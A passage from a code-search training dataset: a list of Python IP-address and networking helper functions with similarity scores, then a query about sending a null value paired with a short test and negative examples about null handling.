\":\".join(re.findall('..', \"{:012x}\".format(mask)))\n return \"{}/{}\".format(value_ether, value_mask)", "def to_vxlan(ip_addr):\n return \"192.168.\" + \".\".join(ip_addr.split(\".\")[2:])", "def reverse_lookup_zone(ipaddress):\n return reverse_dotted_decimals(ipaddress) + '.in-addr.arpa'", "def get_local_host_ip(self) -> str:", "def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet", "def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr", "def genIp():\n ip = \".\".join(str(random.randint(0, 255)) for _ in range(4))\n return ip", "def generateIPAddress(base, subnet, host, mask):\n\n addr = str(base)+'.'+str(subnet)+'.' + str(host)\n if mask != None:\n addr = addr + '/' + str(mask)\n return addr", "def get_ip_type2(self) -> str:\n hex_ip = hexlify(self.message)[154:162]\n ip_addr = int(hex_ip[0:2] + hex_ip[2:4] + hex_ip[4:6] + hex_ip[6:8], 16)\n return inet_ntoa(pack(\">L\", ip_addr))", "def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)", "def ip_to_net_ent_title_ios(ip_addr):\n try:\n ip_words = ip_addr.words\n except AttributeError:\n import netaddr # try to cast to IP Address\n ip_addr = netaddr.IPAddress(ip_addr)\n ip_words = ip_addr.words\n\n log.debug(\"Converting IP to OSI ENT format\")\n area_id = \"49\"\n ip_octets = \"\".join(\"%03d\" % int(\n octet) for octet in ip_words) # single string, padded if needed\n return \".\".join([area_id, ip_octets[0:4], ip_octets[4:8], ip_octets[8:12],\n \"00\"])", "def longToIp(longIp):\n stringIp = socket.inet_ntoa(struct.pack(\"!L\", longIp))\n return stringIp", "def format_hostname(hostname: str) -> str:\n if has_ipv6 and re.match(r\"\\d+.\\d+.\\d+.\\d+\", hostname) is not None:\n hostname = f\"::ffff:{hostname}\"\n return hostname", "def display_first_last_broadcast_dotted(network_address, first_host_address, last_host_address, broadcast_address):\n\n\n\t#Print the results for selected IP/mask\n\t# print(\"\\nWhat are the network, first host, last host and broadcast addresses in dotted decimal?\")\n\t# input('Press enter to continue...')\n\n\tprint (\"\\nAddresses in dotted decimal notation:\")\n\tprint (\"Network address is: %s\" % network_address)\n\tprint (\"First host is: %s\" % first_host_address)\n\tprint (\"Last host is: %s\" % last_host_address)\n\tprint (\"Broadcast address is: %s\" % broadcast_address)\n\tprint(\"\\n\")\n\n\t#return(net_ip_address, bst_ip_address, network_address)", "def test_replace_host_subnet(self):\n pass", "def ip_address(addr):\n parts = addr.split('.')\n if len(parts) != 4:\n raise TypeError('{} does not match an IP address pattern'.format(addr))\n for part in parts:\n try:\n num = int(part)\n if num < 0 or num > 255:\n raise TypeError('{} does not match an IP address pattern'.format(addr))\n except ValueError:\n raise TypeError('{} does not match an IP address pattern'.format(addr))\n return addr", "def reverse_name(net: str) -> str:\n\n network: IPNetwork = ipaddress.ip_network(net)\n ip: IPAddress = network.network_address\n\n if network.version == 4:\n octet_size = 8\n octet_number = 4\n elif network.version == 6:\n octet_size = 4\n octet_number = 32\n else:\n logging.error('Bad address family: %s', network.version)\n abort('I cannot handle this address type')\n\n if network.prefixlen % octet_size != 0:\n logging.error('Mask must be multiple of %d for IPv%d', octet_size, network.version)\n abort(\"I don't know what to do\")\n\n num = network.prefixlen // octet_size\n octets = ip.reverse_pointer.split('.')\n st = '.'.join(octets[(octet_number - num):])\n\n return st", "def _format_senders_correspondent_53D(self, val):\n account = val.get('ACCOUNT')\n name = val.get('NAME')\n address = val.get('ADDRESS')\n if name and address:\n name = FSwiftWriterUtils.split_text_and_prefix(name, 35)\n address = FSwiftWriterUtils.split_text_and_prefix(address, 35)\n val = FSwiftWriterUtils.allocate_space_for_name_address_without_constraint(name, address)\n if account:\n val = \"/\" + str(account) + \"\\n\" + str(val)\n return val", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def handle_hexip(bot, ievent):\n if not ievent.args:\n return ievent.missing('<ip | hex ip>')\n is_a = None\n if _re_hexip.match(ievent.args[0]):\n is_a = 'hexip'\n else:\n try:\n socket.inet_pton(socket.AF_INET, ievent.args[0])\n is_a = 'defip'\n except socket.error:\n pass\n if not is_a:\n ievent.missing('<ip | hex ip>')\n return\n if is_a == 'hexip':\n ip = []\n for i in range(4):\n ip.append(str(int(ievent.args[0][i*2:i*2+2], 16)))\n ip = '.'.join(ip)\n nevent = copy.copy(ievent)\n nevent.args = [ip]\n handle_dns(bot, nevent)\n else:\n test = ievent.args[0].split('.')\n ip = 16777216 * int(test[0]) + 65536 * int(test[1]) + 256 * \\\nint(test[2]) + int(test[3])\n ievent.reply('ip %s = %08x' % (ievent.args[0], ip))", "def ip2host(self, irc, msg, args, ip):\n \n try:\n hostname = socket.gethostbyaddr(ip)\n hostname = hostname[0]\n if hostname:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (hostname, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n except:\n reply = u'gethostbyaddr() Error'\n \n irc.reply(reply.encode('utf-8'))", "def address_string(self):\n\n if self.server.log_ip_activated:\n host = self.client_address[0]\n else:\n host = '127.0.0.1'\n if self.server.resolve_clients:\n return socket.getfqdn(host)\n else:\n return host", "def set_label(self):\n try:\n self.get_mask()\n except ex.excError:\n pass\n try:\n self.getaddr()\n addr = self.addr\n except ex.excError:\n addr = self.ipname\n self.label = \"%s/%s %s/%s\" % (addr, to_cidr(self.mask), self.ipdev, self.ipdevExt)\n if self.ipname != addr:\n self.label += \" \" + self.ipname", "def format_ipv4(value, mask=None):\n value_ipv4 = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(value))])\n if mask is None:\n return value_ipv4\n value_mask = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(mask))])\n return \"{}/{}\".format(value_ipv4, value_mask)", "def process_address(text):\n return sanitize(text[9:])", "def __str__(self):\n return self.the_ip", "def int2ip(n: int) -> str:\n return socket.inet_ntoa(struct.pack(\"!I\", n))", "def format_ipv6(value, mask):\n value_ipv6 = \":\".join(re.findall('..', \"{:032x}\".format(value)))\n if mask is None:\n return value_ipv6\n value_mask = \":\".join(re.findall('..', \"{:032x}\".format(mask)))\n return \"{}/{}\".format(value_ipv6, value_mask)", "def dot():\n print_message(\".\")", "def dotted_netmask(mask):\n mask = int(mask)\n bits = 0xffffffff ^ (1 << 32 - mask) - 1\n return socket.inet_ntoa(struct.pack('>I', bits))", "def _repr_remote(self):\n return \"%s:%d\" % (self.remote_address)", "def randomIP():\n\tip = \".\".join(map(str, (random.randint(0,255)for _ in range(4))))\n\treturn ip", "def AioMessageTypeToIpAddressString(message_type):\n ip = network_config.AioMessageTypeToIpAddress(message_type)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)", "def get_ip(self):", "def w(s):\r\n gv[\"epsf\"].write(s + \"\\n\")", "def address(self):\n return f'Address = {self._peer.address}/{self._peer.subnet.prefixlen}'", "def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )", "def handle_dots(string):\n if '.' in string:\n if string[-1] == '.':\n string = string[:-1]\n else:\n string = string.replace('.', '. ')\n\n return string", "def host2ip(self, irc, msg, args, hostname):\n \n try:\n ip = socket.gethostbyname(hostname)\n if ip:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n \n except:\n reply = u'gethostbyname() Error'\n \n irc.reply(reply.encode('utf-8'))", "def ipwrap(address: Any) -> str:\n try:\n if not isinstance(address, int):\n ipaddress.IPv6Address(address)\n return f\"[{address}]\"\n except ValueError:\n pass\n\n return str(address)", "def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']", "def ip_f(x: Text) -> Tuple[Optional[Text], Optional[Text]]:\n try:\n addrv6 = ipaddress.IPv6Address(x)\n return \"ipv6\", str(addrv6.exploded)\n except ipaddress.AddressValueError:\n try:\n ipaddress.IPv4Address(x)\n return \"ipv4\", x\n except ipaddress.AddressValueError:\n pass\n\n return None, None", "def hex_encode_ip(ip_addr):\n if not ip_addr:\n return None\n\n return base64.b16encode(ip_addr.packed).rjust(32, '0')", "def dots(result):\n sys.stdout.write(CHARACTER[result])\n sys.stdout.flush()", "def __repr__(self):\n return f\"{self.vip}/{self.mask}\"", "def _send(self, data: str):\n try:\n self._sock.sendto(data.encode(\"ascii\"), self._addr)\n except (socket.error, RuntimeError):\n # No time for love, Dr. Jones!\n pass", "def ip_to_str(address):\n return socket.inet_ntop(socket.AF_INET, address)", "def aprs_msg(src,dst,via,addr,msgtext):\n\n to = addr.ljust(9)[:9]\n msg = src + '>' + dst\n if via:\n msg += ',' + via\n msg += '::' + to + ':' + msgtext\n return msg", "def get_address(self):\r\n return \"iDigi\"", "def ip_info():\n return str(getIP())", "def print_local_ip():\n spacer = '-' * 50\n local_ip = gethostbyname(gethostname())\n print('\\n{}\\nLocal IP address is: {}\\n{}'.format(spacer, local_ip, spacer))", "def host_ip_address(self, host_index, vlan_index):\n if isinstance(vlan_index, tuple):\n vlan_index = vlan_index[0]\n return '10.%u.0.%u/%u' % (vlan_index+1, host_index+1, self.NETPREFIX)", "def GetIPAddr():\n cmd = \"ifconfig | awk '/192/ {print $2}'\"\n res = Run(cmd).replace(\"\\n\", \"\") # remove end of line char\n return res.replace(\"addr:\", \"\") # remove \"addr:\" prefix", "def dot():\n\n sys.stdout.write('.')\n sys.stdout.flush()", "def address(self):\n return \"%s:%s\" % (self.ip, self.port)", "def sanitize_dot(func):\n return str(func).replace(\"::\", \"\\\\\")", "def send(self,message):\n self.transport.write(message, (\"228.0.0.5\", udpbport))", "def iplst_to_ipaddr(iplst):\n return \".\".join([str(o) for o in iplst])", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def format_tag(tag):\n # If the tag presented is an IP address then no modifications are required\n try:\n ip_network(tag)\n except ValueError:\n # If an IP was not provided then assume fqdn\n tag = tag.split(\".\")[0]\n tag = truncate(tag, max_len=100)\n return tag", "def ip_for_event (event):\n eth = dpid_to_str(event.dpid,True).split(\"|\")[0].replace(\"-\",\":\")\n return EthAddr(eth)", "def generateRandomIPv4():\n return \".\".join(map(str, (random.randint(0, 255) for _ in range(4))))", "def prepare_value(self, value):\n if value is None:\n return value\n value = value.replace(\" \", \"\").replace(\".\", \"\")\n if value:\n return \"%s.%s.%s.%s\" % (value[0:3], value[3:7], value[7:11], value[11:])\n return value", "def change_ip(sender_socket, ip, port):\n sender_socket.sendto(bytes(\"change ip\", \"UTF-8\"), (ip, port))\n new_ip_str = input(\"New Host IP Address: \")\n sender_socket.sendto(bytes(new_ip_str, \"UTF-8\"), (ip, port))\n sleep(0.5)\n status = sender_socket.recv(BUFFER_SIZE)\n status_message = status.decode(\"UTF-8\")\n if \"IP Address Successfully Changed\" in status_message:\n print(status_message)\n return True\n else:\n print(status_message)\n return False", "def replace_three_dots(self):\n self.value = re.sub(self.patterns['replace_three_dots'], ' …', self.value)\n return self", "def getGwIp(target):\n tmp = target.split('.')\n try:\n gw = (tmp[0] + \".\" + tmp[1] + \".\" + tmp[2] + \".1\")\n except IndexError:\n print(bcolors.FAIL + \" Invalid IP provided: \" + target + bcolors.ENDC)\n return False\n return gw", "def routepack(value):\n return str(value).replace(\"/\",\"!\")" ]
[ "0.72598726", "0.66860425", "0.6652515", "0.6595804", "0.6511511", "0.6166377", "0.6115366", "0.6104999", "0.6004845", "0.5908386", "0.58287203", "0.5827624", "0.5757114", "0.56950575", "0.56721663", "0.55715144", "0.55706215", "0.556447", "0.5561804", "0.55530185", "0.54516596", "0.54496413", "0.5426353", "0.53926975", "0.5392128", "0.53893584", "0.53569096", "0.535198", "0.53455335", "0.53420097", "0.5339464", "0.5338504", "0.53355426", "0.5322107", "0.5309466", "0.5305716", "0.52971506", "0.52936226", "0.52881557", "0.528492", "0.5284452", "0.5281971", "0.52443576", "0.5236537", "0.52309597", "0.5230426", "0.52237624", "0.5222075", "0.521139", "0.52079684", "0.5207371", "0.520505", "0.52027017", "0.51968265", "0.5188847", "0.51820046", "0.5181025", "0.5174663", "0.5168358", "0.51432514", "0.51376826", "0.513469", "0.5125834", "0.5105581", "0.5098868", "0.50957096", "0.50868875", "0.50851285", "0.50847584", "0.50823843", "0.50822467", "0.5081802", "0.50779736", "0.5065286", "0.5064759", "0.5063762", "0.5061711", "0.5053406", "0.5047245", "0.5037974", "0.5019106", "0.5018323", "0.5011488", "0.50006264", "0.49956003", "0.49892136", "0.4980438", "0.49798745", "0.49680758", "0.49653453", "0.49633604", "0.49459702", "0.49386317", "0.49335146", "0.49333227", "0.49240398", "0.49238333", "0.49185684", "0.49126276", "0.49054578", "0.4901652" ]
0.0
-1
Send null value in Description
def test_51(self): assert 'False' == Api.requestBlock('test-51', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _description(self):\n return None", "def shortDescription(self):\n return None", "def get_description_value(obj):\n desc = None if obj is None else obj.GetObjectDescription()\n if desc == \"<nil>\":\n desc = None\n return desc", "def get_is_null_label(self):\n return pgettext_lazy('listfilter AbstractDateTime', 'Has no value')", "def description(self):\r\n if \"description\" in self.data:\r\n return self.data[\"description\"]\r\n return None", "def Description(self) -> str:", "def Description(self) -> str:", "def Description(self, default=None):\n return self.data.get('description', default)", "def Description(self, default=None):\n return self.data.get('description', default)", "def description(self):", "def description(self):\n\t\tif self._record is not None:\n\t\t return self._record.description\n\t\telse:\n\t\t return \"\"", "def describe(self):\n return ''", "def description(self):\n pass", "def description(self):\n pass", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self):\n if \"description\" in self._prop_dict:\n return self._prop_dict[\"description\"]\n else:\n return None", "def get_description(self):", "def description(self, value):\n if len(value):\n self._description = value\n self._description = self._wrap_line(value, self._width)\n\n # Add a blank line\n self._description.append('')", "def description():", "def noneType(value):\r\n return ''", "def description(self, newDescription=None):\n pass", "def __str__(self):\r\n # If the original value is None, represent this as 'NULL'\r\n if self.original is None:\r\n return 'NULL'\r\n return str(self.original)", "def test_empty_description(self):\n self.check_validation_error('description\\n string does not match regex \".+\"', name=\"Name\", description=\"\")", "def set_description(self):\n if 'description' not in self.data:\n if self.verbose:\n click.echo('Adding empty descriptions to root')\n self.data['description'] = ''", "def get_description(self):\n pass", "def __str__(self):\n return \"Description(values={},data_model={})\".format(\n self._values, self.data_model\n )", "def name(self):\n return 'Null'", "def check_no_description(self):\n context = TestContext(session_context=ducktape_mock.session_context(),\n cls=DummyTestNoDescription, function=DummyTestNoDescription.test_this)\n assert context.description == \"\"", "def _set_None(self):\n\n self.description = None\n self.func = None", "def test_null_field(self):\r\n problem = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNotNone(problem.markdown)\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'nullout': ['markdown']}\r\n )\r\n problem = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNone(problem.markdown)", "def description(self) -> typing.Optional[str]:\n return self._values.get('description')", "def description(self, description) :\n\t\ttry :\n\t\t\tself._description = description\n\t\texcept Exception as e:\n\t\t\traise e", "def description(self) -> Optional[str]:\n if hasattr(self, \"_description\"):\n return self._description\n _args: list[Arg] = []\n _ctx = self._select(\"description\", _args)\n return _ctx.execute_sync(Optional[str])", "def description(self) -> Optional[str]:\n if hasattr(self, \"_description\"):\n return self._description\n _args: list[Arg] = []\n _ctx = self._select(\"description\", _args)\n return _ctx.execute_sync(Optional[str])", "def description(self) -> Optional[str]:\n if hasattr(self, \"_description\"):\n return self._description\n _args: list[Arg] = []\n _ctx = self._select(\"description\", _args)\n return _ctx.execute_sync(Optional[str])", "def get_is_not_null_label(self):\n return pgettext_lazy('listfilter AbstractDateTime', 'Has value')", "def silent_none(value):\n if value is None:\n return ''\n return value", "def description(self) -> str:\n pass", "def get_description():\n raise NotImplementedError", "def __str__(self):\n return self.description", "def __str__(self):\n return self.description", "def description(self, value):\n self.definition.description = value", "def get_description(self) -> Optional[str]:\n return self._description", "def description(self, value):\n self._update_values('description', value)", "def get_description(self) -> str:\n pass", "def dataDescription(self, role):\n return None", "def _get_blank_value_19(field):\n if field.null:\n return None\n else:\n return ''", "def get_description(self):\n raise NotImplementedError", "def testClearWithNone(self):\n\n # Bypass setter\n self.node._desc = ['first description']\n\n self.node.desc = None\n\n self.assertEqual(\n [],\n self.node.desc\n )", "def _get_blank_value_18(field):\n if field.null:\n return None\n else:\n return field.value_to_string(None)", "def __str__(self):\n #{{{ Nicely print values\n text = 'Null values for databases: %s' % self.dbcentral.list()\n\n for value in self.null_vals.keys():\n text += \"\\t%s: %s\" % (value,self.null_vals[value])\n\n return text", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")" ]
[ "0.71918756", "0.7042839", "0.66677594", "0.6598743", "0.65510976", "0.65307844", "0.65307844", "0.6500336", "0.6500336", "0.6499697", "0.64579976", "0.6434815", "0.64035326", "0.64035326", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.6350401", "0.6328347", "0.6308527", "0.62993616", "0.62753403", "0.626873", "0.62592566", "0.62395304", "0.6223116", "0.62086266", "0.6198167", "0.61933094", "0.6169609", "0.615959", "0.6138322", "0.6134888", "0.612953", "0.6129257", "0.6129257", "0.6129257", "0.61264503", "0.6114641", "0.6101282", "0.6100275", "0.6095477", "0.6095477", "0.60834324", "0.60573494", "0.60169435", "0.601493", "0.60041016", "0.6000227", "0.59963757", "0.59874076", "0.5975196", "0.5970984", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285" ]
0.0
-1
Send null value in Cheque field
def test_52(self): assert 'False' == Api.requestBlock('test-52')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_blank_value_19(field):\n if field.null:\n return None\n else:\n return ''", "def _get_blank_value_18(field):\n if field.null:\n return None\n else:\n return field.value_to_string(None)", "def none_to_empty(data):\n return data if data is not None else ''", "def silent_none(value):\n if value is None:\n return ''\n return value", "def noneType(value):\r\n return ''", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def get_prep_value(self, value):\n if (value is UNKNOWN) or (value is ''):\n # If Django tries to save an empty string, send the db None (NULL).\n return None\n else:\n # Otherwise, just pass the value.\n return value", "def _nullify(self, value):\n if not str(value).strip():\n return None\n else:\n return value", "def test_serialize_none(self):\n self.assertEqual(serialize(None), 'null')", "def test_add_none_field(self):\n user_id = get_rand_string()\n data = get_rand_string()\n id = get_rand_string()\n\n doc = {}\n doc[\"user_id\"] = user_id\n doc[\"data\"] = data\n doc[\"id\"] = id\n doc[\"num\"] = None\n\n self.conn.add(**doc)", "def testNoneValue(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User',\n u'user@example.com')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.store.add(TagValue(user.id, tag.id, objectID, None))", "def guiField(self, value):\n return None", "def field(self):\n return None", "def NULL(self, t):\n t.value = None\n return t", "def validate_empty_field(self, field, value):\n self.value = value\n self.field = field\n if self.value == \"\":\n message = \"{} field cannot be blank!\".format(self.field)\n raise GraphQLError(message)", "def filter_is_null(self, queryobject):\n raise NotImplementedError()", "def form_InputNoneValue(request):\n schema = schemaish.Structure()\n schema.add('inputStrip', schemaish.String(default=''))\n\n form = formish.Form(schema, 'form')\n form['inputStrip'].widget = formish.Input(strip=True, none_value='BANG')\n return form", "def allow_null_values(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_null_values\")", "def clearField(self):\n self.field.setValue(self.default_val)", "def clearField(self):\n self.field.setValue(self.default_val)", "def format_field(self, value, format_spec):\n if value is None:\n return format(value)\n else:\n return super(NoneFormatter, self).format_field(value, format_spec)\n if value is None:\n return format(value)\n else: raise e", "def setNone(self):\n self.setValue([])", "def convert_nil(self, v, t):\n assert len(v) == 0\n return None", "def _deserialize_null(self, *args):\n return None", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def test_null_field(self):\r\n problem = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNotNone(problem.markdown)\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'nullout': ['markdown']}\r\n )\r\n problem = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNone(problem.markdown)", "def _encode_nullable(data_type, obj, alias_validators, old_style, for_msgpack):\n if obj is not None:\n return _json_compat_obj_encode_helper(\n data_type.validator, obj, alias_validators, old_style, for_msgpack)\n else:\n return None", "def test_update_field_to_null(self, field, field_name):\n control = factories.ControlFactory()\n\n response = self.api.put(control, control.id, {field: None})\n\n self.assert400(response)\n self.assertEqual(response.json[\"message\"],\n field_name + \" for the object is not specified\")\n control = db.session.query(all_models.Control).get(control.id)\n self.assertIsNotNone(control.external_id)", "def is_null(self):\n return self.value is None", "def _val_is_null(self, val):\r\n return val is None", "def clean(self, value):\n if self.null_option is not None and value == settings.FILTERS_NULL_CHOICE_VALUE:\n return None\n return super().clean(value)", "def test_value_to_string(self):\r\n obj = self.rp\r\n field = self.rp._meta.get_field_by_name('body')[0]\r\n self.assertNotEqual(field.value_to_string(obj), u'') # expected\r\n self.assertEqual(field.value_to_string(None), u'') # edge case\r", "def testNoneAssignment(self):\n class MyMessage(messages.Message):\n\n my_field = messages.StringField(1)\n\n m1 = MyMessage()\n m2 = MyMessage()\n m2.my_field = None\n self.assertEquals(m1, m2)", "def get_prep_value(self, value):\r\n if value == \"\" or value is None:\r\n return None\r\n\r\n #if isinstance(value, dict):\r\n value = json.dumps(value, 